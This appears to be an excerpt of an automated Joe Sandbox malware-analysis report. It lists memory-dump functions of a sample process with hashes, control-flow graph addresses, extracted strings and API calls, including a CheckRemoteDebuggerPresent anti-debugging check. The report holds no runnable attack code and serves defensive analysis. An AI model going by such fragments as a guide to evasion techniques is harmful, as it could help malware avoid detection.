                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6542b50833426caa687d54739d88a175f22c258843c4e2680fa4162f9230169a
                                                                                                                    • Instruction ID: cfccb27303d764b9e81d70a28db0783980ec070f585180f039d82d7e332ee451
                                                                                                                    • Opcode Fuzzy Hash: 6542b50833426caa687d54739d88a175f22c258843c4e2680fa4162f9230169a
                                                                                                                    • Instruction Fuzzy Hash: CC62B130A41216CFDB54EB6CD584AAEB7F2EF88314F149469E40AEB350DB35ED46CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 65566538feaaedb891091e9ebb8128f8bbd1a4b9b24c855dbfdb2a231079817e
                                                                                                                    • Instruction ID: 729ea67b85a2d88ba0a926366f2c4fe437bfaaf96b54f0c903d19a1146001c7d
                                                                                                                    • Opcode Fuzzy Hash: 65566538feaaedb891091e9ebb8128f8bbd1a4b9b24c855dbfdb2a231079817e
                                                                                                                    • Instruction Fuzzy Hash: 99328034B401169FDB94EF6CD990BAEB7B2EB88324F108525D406EB351DB39EC46CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8a3e8b35aa94153f9e9a32eb4ba93a3039432249423aa77a0ec11ae40cc7593
                                                                                                                    • Instruction ID: 8e509b31b4c88e6576e86031710f12ae65b14673d469f43ce76a18ec7a770f22
                                                                                                                    • Opcode Fuzzy Hash: a8a3e8b35aa94153f9e9a32eb4ba93a3039432249423aa77a0ec11ae40cc7593
                                                                                                                    • Instruction Fuzzy Hash: 58225030E4021A8FEB64EB6CD5807ADB7B2EB45318F248825E459EF391CB35DC81CB61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 6a2acf0-6a2ad0e 1 6a2ad10-6a2ad13 0->1 2 6a2ad23-6a2ad26 1->2 3 6a2ad15-6a2ad1e 1->3 4 6a2ad30-6a2ad33 2->4 5 6a2ad28-6a2ad2d 2->5 3->2 6 6a2ad35-6a2ad3e 4->6 7 6a2ad4d-6a2ad50 4->7 5->4 8 6a2af27-6a2af35 6->8 9 6a2ad44-6a2ad48 6->9 10 6a2ad52-6a2ad6e 7->10 11 6a2ad73-6a2ad76 7->11 19 6a2aed1 8->19 20 6a2af37-6a2af5e 8->20 9->7 10->11 12 6a2ad8a-6a2ad8d 11->12 13 6a2ad78-6a2ad85 11->13 15 6a2ad9e-6a2ada1 12->15 16 6a2ad8f-6a2ad93 12->16 13->12 23 6a2ada7-6a2adaa 15->23 24 6a2af0d-6a2af16 15->24 21 6a2ad99 16->21 22 6a2af1c-6a2af26 16->22 26 6a2aed2-6a2af03 19->26 25 6a2af60-6a2af63 20->25 21->15 27 6a2adc4-6a2adc6 23->27 28 6a2adac-6a2adbf 23->28 24->6 24->22 30 6a2af72-6a2af75 25->30 31 6a2af65 call 6a2b24b 25->31 57 6a2af0a 26->57 32 6a2adc8 27->32 33 6a2adcd-6a2add0 27->33 28->27 35 6a2af77-6a2af93 30->35 36 6a2af98-6a2af9b 30->36 41 6a2af6b-6a2af6d 31->41 32->33 33->1 38 6a2add6-6a2adfa 33->38 35->36 39 6a2afa8-6a2afab 36->39 40 6a2af9d-6a2afa1 36->40 56 6a2ae00-6a2ae0f 38->56 38->57 45 6a2afb8-6a2afbb 39->45 46 6a2afad-6a2afb7 39->46 43 6a2afa3 40->43 44 6a2afc1-6a2affc 40->44 41->30 43->39 58 6a2b002-6a2b00e 44->58 59 6a2b1ef-6a2b202 44->59 45->44 49 6a2b224-6a2b226 45->49 53 6a2b228 49->53 54 6a2b22d-6a2b230 49->54 53->54 54->25 60 6a2b236-6a2b240 54->60 67 6a2ae11-6a2ae17 56->67 68 6a2ae27-6a2ae62 call 6a265c0 56->68 57->24 65 6a2b010-6a2b029 58->65 66 6a2b02e-6a2b072 58->66 61 6a2b204 59->61 69 6a2b205 61->69 65->61 86 6a2b074-6a2b086 66->86 87 6a2b08e-6a2b0cd 66->87 71 6a2ae1b-6a2ae1d 67->71 72 6a2ae19 67->72 84 6a2ae64-6a2ae6a 68->84 85 6a2ae7a-6a2ae91 68->85 69->69 71->68 72->68 88 6a2ae6e-6a2ae70 84->88 89 6a2ae6c 84->89 99 6a2ae93-6a2ae99 85->99 100 6a2aea9-6a2aeba 85->100 86->87 93 6a2b0d3-6a2b1ae call 6a265c0 87->93 94 6a2b1b4-6a2b1c9 87->94 88->85 89->85 93->94 94->59 102 6a2ae9b 99->102 103 6a2ae9d-6a2ae9f 99->103 100->26 106 6a2aebc-6a2aec2 100->106 102->100 103->100 107 6a2aec6-6a2aec8 106->107 108 6a2aec4 106->108 107->19 108->26
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 00300a24f438af683470731644948ecb938ee92640df8965a12cb39712028e2f
                                                                                                                    • Instruction ID: 195c306358244b7bb6f03b76bad19fbff2cbb9e62220d2b5c778e873d6d3845f
                                                                                                                    • Opcode Fuzzy Hash: 00300a24f438af683470731644948ecb938ee92640df8965a12cb39712028e2f
                                                                                                                    • Instruction Fuzzy Hash: ECE16E30E5022A8FDB69EF68D4406AEB7F2EF85304F108929D50AEB355DB35DC46CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 255 6a2b668-6a2b688 256 6a2b68a-6a2b68d 255->256 257 6a2b693-6a2b696 256->257 258 6a2b7bb-6a2b7c1 256->258 259 6a2b698-6a2b69c 257->259 260 6a2b6bd-6a2b6c0 257->260 261 6a2b7c7 258->261 262 6a2b6d5-6a2b6db 258->262 263 6a2b6a2-6a2b6b2 259->263 264 6a2ba03-6a2ba3e 259->264 266 6a2b6c2-6a2b6cb 260->266 267 6a2b6d0-6a2b6d3 260->267 265 6a2b7cc-6a2b7cf 261->265 262->264 268 6a2b6e1-6a2b6e8 262->268 278 6a2b6b8 263->278 279 6a2b89c-6a2b8a0 263->279 281 6a2ba40-6a2ba43 264->281 269 6a2b7f2-6a2b7f5 265->269 270 6a2b7d1-6a2b7ed 265->270 266->267 267->262 271 6a2b6ed-6a2b6f0 267->271 268->271 276 6a2b7f7-6a2b7f8 269->276 277 6a2b7fd-6a2b800 269->277 270->269 274 6a2b6f2-6a2b6fb 271->274 275 6a2b70d-6a2b710 271->275 274->264 282 6a2b701-6a2b708 274->282 283 6a2b712-6a2b715 275->283 284 6a2b71a-6a2b71d 275->284 276->277 277->276 285 6a2b802-6a2b805 277->285 278->260 279->264 288 6a2b8a6-6a2b8b6 279->288 289 6a2ba49-6a2ba71 281->289 290 6a2bcaf-6a2bcb2 281->290 282->275 283->284 286 6a2b744-6a2b747 284->286 287 6a2b71f-6a2b723 284->287 291 6a2b812-6a2b815 285->291 292 6a2b807-6a2b80d 285->292 286->276 296 6a2b74d-6a2b750 286->296 287->264 293 6a2b729-6a2b739 287->293 288->287 318 6a2b8bc 288->318 339 6a2ba73-6a2ba76 289->339 340 6a2ba7b-6a2babf 289->340 298 6a2bcb4-6a2bcd0 290->298 299 6a2bcd5-6a2bcd7 290->299 294 6a2b817-6a2b865 call 6a265c0 291->294 295 6a2b86a-6a2b86d 291->295 292->291 293->276 322 6a2b73f 293->322 294->295 302 6a2b884-6a2b887 295->302 303 6a2b86f-6a2b873 295->303 304 6a2b752-6a2b759 296->304 305 6a2b764-6a2b767 296->305 298->299 300 6a2bcd9 299->300 301 6a2bcde-6a2bce1 299->301 300->301 301->281 308 6a2bce7-6a2bcf0 301->308 312 6a2b897-6a2b89a 302->312 313 6a2b889-6a2b892 302->313 303->264 309 6a2b879-6a2b87f 303->309 314 6a2b972-6a2b97b 304->314 315 6a2b75f 304->315 316 6a2b774-6a2b777 305->316 317 6a2b769-6a2b76f 305->317 309->302 312->279 321 6a2b8c1-6a2b8c4 312->321 313->312 320 6a2b980-6a2b983 314->320 315->305 324 6a2b7b6-6a2b7b9 316->324 325 6a2b779-6a2b78e 316->325 317->316 318->321 327 6a2b985-6a2b98a 320->327 328 6a2b98d-6a2b990 320->328 330 6a2b8c6-6a2b8cf 321->330 331 6a2b8d4-6a2b8d7 321->331 322->286 324->258 324->265 325->264 347 6a2b794-6a2b7b1 325->347 327->328 334 6a2b9b2-6a2b9b5 328->334 335 6a2b992-6a2b9ad 328->335 330->331 336 6a2b8e8-6a2b8f1 331->336 337 6a2b8d9-6a2b8dc 331->337 343 6a2b9c7-6a2b9ca 334->343 344 6a2b9b7 334->344 335->334 336->274 341 6a2b8f7 336->341 345 6a2b8e3-6a2b8e6 337->345 346 6a2b8de-6a2b8e0 337->346 339->308 376 6a2bca4-6a2bcae 340->376 377 6a2bac5-6a2bace 340->377 350 6a2b8fc-6a2b8ff 341->350 343->276 349 6a2b9d0-6a2b9d3 343->349 358 6a2b9bf-6a2b9c2 344->358 345->336 345->350 346->345 347->324 352 6a2b9e6-6a2b9e8 349->352 353 6a2b9d5-6a2b9d9 349->353 354 6a2b912-6a2b915 350->354 355 6a2b901-6a2b90d 350->355 361 6a2b9ea 352->361 362 6a2b9ef-6a2b9f2 352->362 353->264 360 6a2b9db-6a2b9e1 353->360 363 6a2b953-6a2b956 354->363 364 6a2b917-6a2b92c 354->364 355->354 358->343 360->352 361->362 362->256 365 6a2b9f8-6a2ba02 362->365 369 6a2b958-6a2b95c 363->369 370 6a2b96d-6a2b970 363->370 364->264 374 6a2b932-6a2b94e 364->374 369->264 371 6a2b962-6a2b968 369->371 370->314 370->320 371->370 374->363 378 6a2bad4-6a2bb40 call 6a265c0 377->378 379 6a2bc9a-6a2bc9f 377->379 389 6a2bb46-6a2bb4b 378->389 390 6a2bc3a-6a2bc4f 378->390 379->376 392 6a2bb67 389->392 393 6a2bb4d-6a2bb53 389->393 390->379 396 6a2bb69-6a2bb6f 392->396 394 6a2bb55-6a2bb57 393->394 395 6a2bb59-6a2bb5b 393->395 397 6a2bb65 394->397 395->397 398 6a2bb71-6a2bb77 396->398 399 6a2bb84-6a2bb91 396->399 397->396 400 6a2bc25-6a2bc34 398->400 401 6a2bb7d 398->401 406 6a2bb93-6a2bb99 399->406 407 6a2bba9-6a2bbb6 399->407 400->389 400->390 401->399 402 6a2bbb8-6a2bbc5 401->402 403 6a2bbec-6a2bbf9 401->403 413 6a2bbc7-6a2bbcd 402->413 414 6a2bbdd-6a2bbea 402->414 415 6a2bc11-6a2bc1e 403->415 416 6a2bbfb-6a2bc01 403->416 408 6a2bb9b 406->408 409 6a2bb9d-6a2bb9f 406->409 407->400 408->407 409->407 419 6a2bbd1-6a2bbd3 413->419 420 6a2bbcf 413->420 414->400 415->400 417 6a2bc03 416->417 418 6a2bc05-6a2bc07 416->418 417->415 418->415 419->414 420->414
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: efdea4a35a07f943decc8104db5633010db224581964748b560ca21390f16b67
                                                                                                                    • Instruction ID: 2bb45148c7a6f35bd95b347b45da9a9f5a245fab8556de28a54df988dfc2d482
                                                                                                                    • Opcode Fuzzy Hash: efdea4a35a07f943decc8104db5633010db224581964748b560ca21390f16b67
                                                                                                                    • Instruction Fuzzy Hash: 1B026E30E4021A8FDB64EF6CD5806ADB7B2FB45318F10896AD419DF251DB35EC85CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 423 6a29170-6a29195 424 6a29197-6a2919a 423->424 425 6a291a0-6a291b5 424->425 426 6a29a58-6a29a5b 424->426 432 6a291b7-6a291bd 425->432 433 6a291cd-6a291e3 425->433 427 6a29a81-6a29a83 426->427 428 6a29a5d-6a29a7c 426->428 430 6a29a85 427->430 431 6a29a8a-6a29a8d 427->431 428->427 430->431 431->424 435 6a29a93-6a29a9d 431->435 436 6a291c1-6a291c3 432->436 437 6a291bf 432->437 440 6a291ee-6a291f0 433->440 436->433 437->433 441 6a291f2-6a291f8 440->441 442 6a29208-6a29279 440->442 443 6a291fa 441->443 444 6a291fc-6a291fe 441->444 453 6a292a5-6a292c1 442->453 454 6a2927b-6a2929e 442->454 443->442 444->442 459 6a292c3-6a292e6 453->459 460 6a292ed-6a29308 453->460 454->453 459->460 465 6a29333-6a2934e 460->465 466 6a2930a-6a2932c 460->466 471 6a29373-6a29381 465->471 472 6a29350-6a2936c 465->472 466->465 473 6a29383-6a2938c 471->473 474 6a29391-6a2940b 471->474 472->471 473->435 480 6a29458-6a2946d 474->480 481 6a2940d-6a2942b 474->481 480->426 485 6a29447-6a29456 481->485 486 6a2942d-6a2943c 481->486 485->480 485->481 486->485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 2265136502e726a500c8e6d3bccb1231b50a2e5b4f01bfa6751808aa45532833
                                                                                                                    • Instruction ID: 027d6cf88ee9b07165fd90a0fe0cd030428030e45f9464270833bb51ec0efaaf
                                                                                                                    • Opcode Fuzzy Hash: 2265136502e726a500c8e6d3bccb1231b50a2e5b4f01bfa6751808aa45532833
                                                                                                                    • Instruction Fuzzy Hash: FE913C30F4021A9FDBA4DF69D9507AFB7F6EBC8604F108569C40DEB344EA749C868B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 489 6a2cf60-6a2cf7b 490 6a2cf7d-6a2cf80 489->490 491 6a2cf82-6a2cf98 490->491 492 6a2cf9d-6a2cfa0 490->492 491->492 493 6a2cfa2-6a2cfa7 492->493 494 6a2cfaa-6a2cfad 492->494 493->494 496 6a2cff6-6a2cff9 494->496 497 6a2cfaf-6a2cff1 494->497 498 6a2d042-6a2d045 496->498 499 6a2cffb-6a2d03d 496->499 497->496 501 6a2d047-6a2d089 498->501 502 6a2d08e-6a2d091 498->502 499->498 501->502 504 6a2d093-6a2d095 502->504 505 6a2d0a0-6a2d0a3 502->505 508 6a2d09b 504->508 509 6a2d449 504->509 510 6a2d0a5-6a2d0b4 505->510 511 6a2d0ec-6a2d0ef 505->511 508->505 513 6a2d44c-6a2d458 509->513 514 6a2d0c3-6a2d0cf 510->514 515 6a2d0b6-6a2d0bb 510->515 516 6a2d0f1-6a2d100 511->516 517 6a2d138-6a2d13b 511->517 513->516 519 6a2d45e-6a2d74b 513->519 523 6a2d0d5-6a2d0e7 514->523 524 6a2d97d-6a2d9b6 514->524 515->514 526 6a2d102-6a2d107 516->526 527 6a2d10f-6a2d11b 516->527 521 6a2d184-6a2d187 517->521 522 6a2d13d-6a2d17f 517->522 702 6a2d972-6a2d97c 519->702 703 6a2d751-6a2d757 519->703 521->513 529 6a2d18d-6a2d190 521->529 522->521 523->511 539 6a2d9b8-6a2d9bb 524->539 526->527 527->524 530 6a2d121-6a2d133 527->530 532 6a2d192-6a2d194 529->532 533 6a2d19f-6a2d1a2 529->533 530->517 541 6a2d307-6a2d310 532->541 542 6a2d19a 532->542 544 6a2d1a4-6a2d1e6 533->544 545 6a2d1eb-6a2d1ee 533->545 548 6a2d9ee-6a2d9f1 539->548 549 6a2d9bd-6a2d9e9 539->549 553 6a2d312-6a2d317 541->553 554 6a2d31f-6a2d32b 541->554 542->533 544->545 546 6a2d1f0-6a2d232 545->546 547 6a2d237-6a2d23a 545->547 546->547 562 6a2d283-6a2d286 547->562 563 6a2d23c-6a2d27e 547->563 559 6a2d9f3-6a2da0f 548->559 560 6a2da14-6a2da17 548->560 549->548 553->554 556 6a2d331-6a2d345 554->556 557 6a2d43c-6a2d441 554->557 556->509 582 6a2d34b-6a2d35d 556->582 557->509 559->560 569 6a2da26-6a2da28 560->569 570 6a2da19 call 6a2dad5 560->570 565 6a2d288-6a2d2a4 562->565 566 6a2d2a9-6a2d2ac 562->566 563->562 565->566 575 6a2d2f5-6a2d2f7 566->575 576 6a2d2ae-6a2d2f0 566->576 578 6a2da2a 569->578 579 6a2da2f-6a2da32 569->579 588 6a2da1f-6a2da21 570->588 586 6a2d2f9 575->586 587 6a2d2fe-6a2d301 575->587 576->575 578->579 579->539 581 6a2da34-6a2da43 579->581 601 6a2da45-6a2daa8 call 6a265c0 581->601 602 6a2daaa-6a2dabf 581->602 603 6a2d381-6a2d383 582->603 604 6a2d35f-6a2d365 582->604 586->587 587->490 587->541 588->569 601->602 621 6a2dac0 602->621 616 6a2d38d-6a2d399 603->616 607 6a2d367 604->607 608 6a2d369-6a2d375 604->608 614 6a2d377-6a2d37f 607->614 608->614 614->616 629 6a2d3a7 616->629 630 6a2d39b-6a2d3a5 616->630 621->621 632 6a2d3ac-6a2d3ae 629->632 630->632 632->509 635 6a2d3b4-6a2d3d0 call 6a265c0 632->635 644 6a2d3d2-6a2d3d7 635->644 645 6a2d3df-6a2d3eb 635->645 644->645 645->557 647 6a2d3ed-6a2d43a 645->647 647->509 704 6a2d766-6a2d76f 703->704 705 6a2d759-6a2d75e 703->705 704->524 706 6a2d775-6a2d788 704->706 705->704 708 6a2d962-6a2d96c 706->708 709 6a2d78e-6a2d794 706->709 708->702 708->703 710 6a2d7a3-6a2d7ac 709->710 711 6a2d796-6a2d79b 709->711 710->524 712 6a2d7b2-6a2d7d3 710->712 711->710 715 6a2d7e2-6a2d7eb 712->715 716 6a2d7d5-6a2d7da 712->716 715->524 717 6a2d7f1-6a2d80e 715->717 716->715 717->708 720 6a2d814-6a2d81a 717->720 720->524 721 6a2d820-6a2d839 720->721 723 6a2d955-6a2d95c 721->723 724 6a2d83f-6a2d866 721->724 723->708 723->720 724->524 727 6a2d86c-6a2d876 724->727 727->524 728 6a2d87c-6a2d893 727->728 730 6a2d8a2-6a2d8bd 728->730 731 6a2d895-6a2d8a0 728->731 730->723 736 6a2d8c3-6a2d8dc call 6a265c0 730->736 731->730 740 6a2d8eb-6a2d8f4 736->740 741 6a2d8de-6a2d8e3 736->741 740->524 742 6a2d8fa-6a2d94e 740->742 741->740 742->723
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: 933010cbcb066dba5c05c5a4869aeb2a27e106fa5d205d0345dbeeb94180f079
                                                                                                                    • Instruction ID: 461e8975cbee4e0d10702ac2477fba31e4452bcbcfcf07c21fca9ee65bdc44b4
                                                                                                                    • Opcode Fuzzy Hash: 933010cbcb066dba5c05c5a4869aeb2a27e106fa5d205d0345dbeeb94180f079
                                                                                                                    • Instruction Fuzzy Hash: 8B624F30A40216CFCB55EF68D580A5EB7B2FF84304B248979D00A9F765DB75ED8ACB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 801 6a24b70-6a24b94 802 6a24b96-6a24b99 801->802 803 6a24bba-6a24bbd 802->803 804 6a24b9b-6a24bb5 802->804 805 6a24bc3-6a24cbb 803->805 806 6a2529c-6a2529e 803->806 804->803 824 6a24cc1-6a24d0e call 6a25421 805->824 825 6a24d3e-6a24d45 805->825 808 6a252a0 806->808 809 6a252a5-6a252a8 806->809 808->809 809->802 810 6a252ae-6a252bb 809->810 838 6a24d14-6a24d30 824->838 826 6a24d4b-6a24dbb 825->826 827 6a24dc9-6a24dd2 825->827 844 6a24dc6 826->844 845 6a24dbd 826->845 827->810 841 6a24d32 838->841 842 6a24d3b-6a24d3c 838->842 841->842 842->825 844->827 845->844
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: 81f85d11cb4c1343ea05fa76f0263823db33d7b400301a00dd474f73d9fe2ff4
                                                                                                                    • Instruction ID: a7fb0900e9f9a3c19f0fc068bd7e59dc98fa054aa26f3fc62a6deab6a50b4e56
                                                                                                                    • Opcode Fuzzy Hash: 81f85d11cb4c1343ea05fa76f0263823db33d7b400301a00dd474f73d9fe2ff4
                                                                                                                    • Instruction Fuzzy Hash: C2616230F402199FEB54DFA9C8547AEBBF6FB88704F20842AD506EB395DB758C418B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1191 6a29162-6a29195 1194 6a29197-6a2919a 1191->1194 1195 6a291a0-6a291b5 1194->1195 1196 6a29a58-6a29a5b 1194->1196 1202 6a291b7-6a291bd 1195->1202 1203 6a291cd-6a291e3 1195->1203 1197 6a29a81-6a29a83 1196->1197 1198 6a29a5d-6a29a7c 1196->1198 1200 6a29a85 1197->1200 1201 6a29a8a-6a29a8d 1197->1201 1198->1197 1200->1201 1201->1194 1205 6a29a93-6a29a9d 1201->1205 1206 6a291c1-6a291c3 1202->1206 1207 6a291bf 1202->1207 1210 6a291ee-6a291f0 1203->1210 1206->1203 1207->1203 1211 6a291f2-6a291f8 1210->1211 1212 6a29208-6a29279 1210->1212 1213 6a291fa 1211->1213 1214 6a291fc-6a291fe 1211->1214 1223 6a292a5-6a292c1 1212->1223 1224 6a2927b-6a2929e 1212->1224 1213->1212 1214->1212 1229 6a292c3-6a292e6 1223->1229 1230 6a292ed-6a29308 1223->1230 1224->1223 1229->1230 1235 6a29333-6a2934e 1230->1235 1236 6a2930a-6a2932c 1230->1236 1241 6a29373-6a29381 1235->1241 1242 6a29350-6a2936c 1235->1242 1236->1235 1243 6a29383-6a2938c 1241->1243 1244 6a29391-6a2940b 1241->1244 1242->1241 1243->1205 1250 6a29458-6a2946d 1244->1250 1251 6a2940d-6a2942b 1244->1251 1250->1196 1255 6a29447-6a29456 1251->1255 1256 6a2942d-6a2943c 1251->1256 1255->1250 1255->1251 1256->1255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 91cfe7cbba4af8fa740e6fccdceeb6a5e1bcd5cbbce65e8191fce424a950a3d2
                                                                                                                    • Instruction ID: cdfc521053caefebb1346643f926e54f4e2f092eecf243b702f71d79484cb01b
                                                                                                                    • Opcode Fuzzy Hash: 91cfe7cbba4af8fa740e6fccdceeb6a5e1bcd5cbbce65e8191fce424a950a3d2
                                                                                                                    • Instruction Fuzzy Hash: CD512E30B402169FEB54DF69E950B6F73F6EBC8644F148469C409EB394EA74DC428B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1259 6a24b60-6a24b94 1262 6a24b96-6a24b99 1259->1262 1263 6a24bba-6a24bbd 1262->1263 1264 6a24b9b-6a24bb5 1262->1264 1265 6a24bc3-6a24cbb 1263->1265 1266 6a2529c-6a2529e 1263->1266 1264->1263 1284 6a24cc1-6a24d0e call 6a25421 1265->1284 1285 6a24d3e-6a24d45 1265->1285 1268 6a252a0 1266->1268 1269 6a252a5-6a252a8 1266->1269 1268->1269 1269->1262 1270 6a252ae-6a252bb 1269->1270 1298 6a24d14-6a24d30 1284->1298 1286 6a24d4b-6a24dbb 1285->1286 1287 6a24dc9-6a24dd2 1285->1287 1304 6a24dc6 1286->1304 1305 6a24dbd 1286->1305 1287->1270 1301 6a24d32 1298->1301 1302 6a24d3b-6a24d3c 1298->1302 1301->1302 1302->1285 1304->1287 1305->1304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq
                                                                                                                    • API String ID: 0-936005338
                                                                                                                    • Opcode ID: 82e74341e37a4c3bcc5fd71503b8304fd616822f6ede9fd829ad643925ca9ff4
                                                                                                                    • Instruction ID: 699e4ed40140263958956d9c5a29994073b546905e072f3083ffd75557949020
                                                                                                                    • Opcode Fuzzy Hash: 82e74341e37a4c3bcc5fd71503b8304fd616822f6ede9fd829ad643925ca9ff4
                                                                                                                    • Instruction Fuzzy Hash: E0517030F002199FEB559FA9C854BAEBAF6FF89700F208529D506EB395DA758C018B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1487 2e4efc0-2e4efdb 1488 2e4f005-2e4f01b 1487->1488 1489 2e4efdd-2e4f004 1487->1489 1510 2e4f01d call 2e4efc0 1488->1510 1511 2e4f01d call 2e4f0a8 1488->1511 1492 2e4f022-2e4f024 1493 2e4f026-2e4f029 1492->1493 1494 2e4f02a-2e4f089 1492->1494 1501 2e4f08f-2e4f11c GlobalMemoryStatusEx 1494->1501 1502 2e4f08b-2e4f08e 1494->1502 1506 2e4f125-2e4f14d 1501->1506 1507 2e4f11e-2e4f124 1501->1507 1507->1506 1510->1492 1511->1492
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4159459212.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_2e40000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1afcc5829fe1ad66a97ccbc0e699015e282980832b5e7f7d16881aa3cff0a69a
                                                                                                                    • Instruction ID: c4fc7487b7b7bb9a4237679cf62bed1611e2ac1149dddebcdb3a43446a576137
                                                                                                                    • Opcode Fuzzy Hash: 1afcc5829fe1ad66a97ccbc0e699015e282980832b5e7f7d16881aa3cff0a69a
                                                                                                                    • Instruction Fuzzy Hash: A7412372E043599FCB10DF79E8002DEBBF5EF89310F1585AAE404A7651EB349884CBE1
                                                                                                                    APIs
                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02E470C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4159459212.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_2e40000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    • Opcode ID: 7e5c95e36ba4f9542d8903897ba33fdcfe18e0e1ed0af541416a27bba257e4b9
                                                                                                                    • Instruction ID: 21189047f4fab99593d82de6c30bed9b46c4efaf256c3bbb4d616a097b453090
